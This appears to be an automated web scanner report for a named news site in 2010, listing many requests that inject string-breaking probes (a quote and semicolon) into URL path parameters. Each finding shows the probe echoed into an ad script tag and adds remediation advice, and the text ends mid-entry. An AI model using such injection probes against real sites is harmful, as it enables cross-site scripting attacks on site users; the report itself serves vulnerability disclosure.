GET /careers/writing+workers+with+children/3943108da20f'%3bafe2f9b541b/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 70161 Expires: Sun, 19 Dec 2010 03:15:44 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:15:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/writing-workers-with-children/3943108da20f';afe2f9b541b/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=writing-workers-with-children;kw=3943108da20f';afe2f9b541b;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=17 ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf1b5'%3bbd8a9e4eb8e was submitted in the REST URL parameter 4. This input was echoed as cf1b5';bd8a9e4eb8e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/writing+workers+with+children/3943108/cf1b5'%3bbd8a9e4eb8e HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:15:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:15:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37340
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f2aa'%3b1645e3d562a was submitted in the REST URL parameter 1. This input was echoed as 2f2aa';1645e3d562a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css2f2aa'%3b1645e3d562a/print.css HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 03:03:12 GMT Date: Sun, 19 Dec 2010 03:03:12 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 42946
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 680dd'%3b2c367558245 was submitted in the REST URL parameter 2. This input was echoed as 680dd';2c367558245 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/680dd'%3b2c367558245 HTTP/1.1 Host: www.financialpost.com Proxy-Connection: keep-alive Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:03:17 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:03:17 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 42979
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3389'%3bbf445645e7b was submitted in the REST URL parameter 1. This input was echoed as c3389';bf445645e7b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cssc3389'%3bbf445645e7b/story_widget.min.css HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 02:58:08 GMT Date: Sun, 19 Dec 2010 02:58:08 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43144
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bee00'%3b7dd73a18789 was submitted in the REST URL parameter 2. This input was echoed as bee00';7dd73a18789 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/bee00'%3b7dd73a18789 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:21 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43068
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ec90'%3bc33f3436c73 was submitted in the REST URL parameter 1. This input was echoed as 7ec90';c33f3436c73 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur7ec90'%3bc33f3436c73/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:13:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:13:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44045
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c621'%3b702d19f034f was submitted in the REST URL parameter 1. This input was echoed as 9c621';702d19f034f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur9c621'%3b702d19f034f/Hidden+angels+Magnet+aspiring+startups/3967315/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 83762 Expires: Sun, 19 Dec 2010 03:14:21 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:14:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur9c621';702d19f034f/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur9c621';702d19f034f;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=70166368?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba98e'%3bb4d3a3bee90 was submitted in the REST URL parameter 3. This input was echoed as ba98e';b4d3a3bee90 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315ba98e'%3bb4d3a3bee90/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 47894 Expires: Sun, 19 Dec 2010 03:14:39 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:14:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/hidden-angels-magnet-aspiring-startups/3967315ba98e';b4d3a3bee90/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=hidden-angels-magnet-aspiring-startups;kw=3967315ba98e';b4d3a3bee90;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surro ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9386'%3bab3ee5a69d was submitted in the REST URL parameter 4. This input was echoed as a9386';ab3ee5a69d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315/a9386'%3bab3ee5a69d HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:14:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:14:57 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37683
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba574'%3b9b0c1337c4a was submitted in the REST URL parameter 1. This input was echoed as ba574';9b0c1337c4a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneurba574'%3b9b0c1337c4a/Partners+leverage+gift+card+idea/3931988/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 82924 Expires: Sun, 19 Dec 2010 03:14:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:14:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneurba574';9b0c1337c4a/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneurba574';9b0c1337c4a;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=36654678?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 547fc'%3b614300144fa was submitted in the REST URL parameter 3. This input was echoed as 547fc';614300144fa in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Partners+leverage+gift+card+idea/3931988547fc'%3b614300144fa/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 54486 Expires: Sun, 19 Dec 2010 03:14:48 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:14:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/partners-leverage-gift-card-idea/3931988547fc';614300144fa/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=partners-leverage-gift-card-idea;kw=3931988547fc';614300144fa;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38251'%3b14ab344cd5d was submitted in the REST URL parameter 4. This input was echoed as 38251';14ab344cd5d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Partners+leverage+gift+card+idea/3931988/38251'%3b14ab344cd5d HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:15:18 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:15:18 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37570
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2289'%3bea2284d08bf was submitted in the REST URL parameter 1. This input was echoed as b2289';ea2284d08bf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneurb2289'%3bea2284d08bf/Social+media+gives+medium+life/3931982/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 78583 Expires: Sun, 19 Dec 2010 03:14:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:14:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneurb2289';ea2284d08bf/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneurb2289';ea2284d08bf;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=25921326?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 314a3'%3b231830f9dd8 was submitted in the REST URL parameter 3. This input was echoed as 314a3';231830f9dd8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Social+media+gives+medium+life/3931982314a3'%3b231830f9dd8/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 54415 Expires: Sun, 19 Dec 2010 03:14:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:14:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/social-media-gives-medium-life/3931982314a3';231830f9dd8/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=social-media-gives-medium-life;kw=3931982314a3';231830f9dd8;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+' ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afc98'%3ba15a08852bc was submitted in the REST URL parameter 4. This input was echoed as afc98';a15a08852bc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Social+media+gives+medium+life/3931982/afc98'%3ba15a08852bc HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:15:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:15:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44342
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f775e'%3b6b7ab346bbb was submitted in the REST URL parameter 1. This input was echoed as f775e';6b7ab346bbb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
